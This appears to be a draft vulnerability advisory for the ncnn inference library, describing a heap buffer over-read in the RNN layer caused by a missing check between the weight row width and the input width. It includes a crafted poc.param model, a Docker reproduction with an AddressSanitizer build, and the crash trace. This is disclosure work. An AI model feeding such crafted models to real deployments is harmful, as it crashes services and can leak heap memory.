All advisories
Draft

RNN Heap Buffer Read In ncnnoptimize

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

RNN Heap Buffer Read In ncnnoptimize

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/rnn.cpp:90 in rnn
Sanitizer verdict: heap-buffer-overflow

Summary

A crafted .param/.bin pair drives the RNN kernel to read an attacker-chosen number of floats past the end of its input-weight row, terminating ncnnoptimize and, without a sanitizer, multiplying uninitialized heap data into the layer output. The entry point is ncnnoptimize inparam inbin outparam outbin 0, which loads both attacker-controlled files and then runs the graph inside ModelWriter::shape_inference(). Any application that loads an untrusted model and calls Extractor::extract reaches the same kernel.

Detail

RNN::load_param reads num_output (field 0), weight_data_size (field 1) and direction (field 2) from the model file. RNN::load_model derives the input-weight row width from those numbers alone: size = weight_data_size / num_directions / num_output, and loads weight_xc_data with that many columns. The compute kernel then throws that width away and re-derives it from the runtime tensor, using bottom_blob.w as the loop bound over the weight row:

// src/layer/rnn.cpp:32
int RNN::load_model(const ModelBin& mb)
{
    int num_directions = direction == 2 ? 2 : 1;

    int size = weight_data_size / num_directions / num_output;

    // raw weight data
    weight_xc_data = mb.load(size, num_output, num_directions, 0);

// src/layer/rnn.cpp:62
static int rnn(const Mat& bottom_blob, Mat& top_blob, int reverse, const Mat& weight_xc, const Mat& bias_c, const Mat& weight_hc, Mat& hidden_state, const Option& opt)
{
    int size = bottom_blob.w;

// src/layer/rnn.cpp:83
            const float* weight_xc_ptr = weight_xc.row(q);
            const float* weight_hc_ptr = weight_hc.row(q);

            float H = bias_c[q];

            for (int i = 0; i < size; i++)
            {
                H += weight_xc_ptr[i] * x[i];
            }

Nothing between load_model and the kernel compares bottom_blob.w with weight_xc.w. The PoC exploits exactly that gap: RNN rnn 1 1 data out 0=1 1=1 2=0 gives num_output = 1, weight_data_size = 1, direction = 0, so size in load_model is 1 / 1 / 1 = 1 and weight_xc_data is a single-float row. The feeding Input data 0 1 data 0=100000 makes shape inference hand the layer a 100000-wide tensor, so size inside rnn() becomes 100000.

The loop therefore dereferences weight_xc_ptr[i] for i up to 99999 against a row that legitimately holds one element. The row's backing allocation is the 84-byte region in the ASan report (16-byte padded payload, 4-byte refcount, 64-byte NCNN_MALLOC_OVERREAD slack); the read at i == 21 lands at offset 84 and is the first access ASan can flag, which is why the report shows READ of size 4 0 bytes after that region. Had the process survived, the loop would have continued for another ~100000 floats.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-rnn-heap-buffer-read-in-ncnnoptimize && cd ncnn-poc-rnn-heap-buffer-read-in-ncnnoptimize

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
2 2
Input data 0 1 data 0=100000
RNN rnn 1 1 data out 0=1 1=1
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50e000000154 at pc 0x58dd53d9fb70 bp 0x7fffeaca55b0 sp 0x7fffeaca55a0
READ of size 4 at 0x50e000000154 thread T0
    #0 0x58dd53d9fb6f in rnn /ncnn/src/layer/rnn.cpp:90
    #1 0x58dd53dc5010 in ncnn::RNN::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/layer/rnn.cpp:362
    #2 0x58dd500c270b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
    #3 0x58dd500aab7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #4 0x58dd5010a9e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #5 0x58dd4ff9c3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #6 0x58dd50019eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #7 0x72d4dc8bd1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #8 0x72d4dc8bd28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x58dd4ff99624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x50e000000154 is located 0 bytes after 84-byte region [0x50e000000100,0x50e000000154)
allocated by thread T0 here:
    #0 0x72d4dcf36f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x58dd5006e433 in fastMalloc /ncnn/src/allocator.h:62
    #2 0x58dd5006e433 in ncnn::Mat::create(int, int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:583
    #3 0x58dd5005f80e in ncnn::Mat::reshape(int, int, int, ncnn::Allocator*) const /ncnn/src/mat.cpp:210
    #4 0x58dd5008dd94 in ncnn::ModelBin::load(int, int, int, int) const /ncnn/src/modelbin.cpp:40
    #5 0x58dd53d97ef3 in ncnn::RNN::load_model(ncnn::ModelBin const&) /ncnn/src/layer/rnn.cpp:39
    #6 0x58dd50105a84 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2080
    #7 0x58dd50019c34 in main /ncnn/tools/ncnnoptimize.cpp:2793
    #8 0x72d4dc8bd1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x72d4dc8bd28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x58dd4ff99624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: heap-buffer-overflow /ncnn/src/layer/rnn.cpp:90 in rnn

Credit

Zheng Yu @ DepthFirst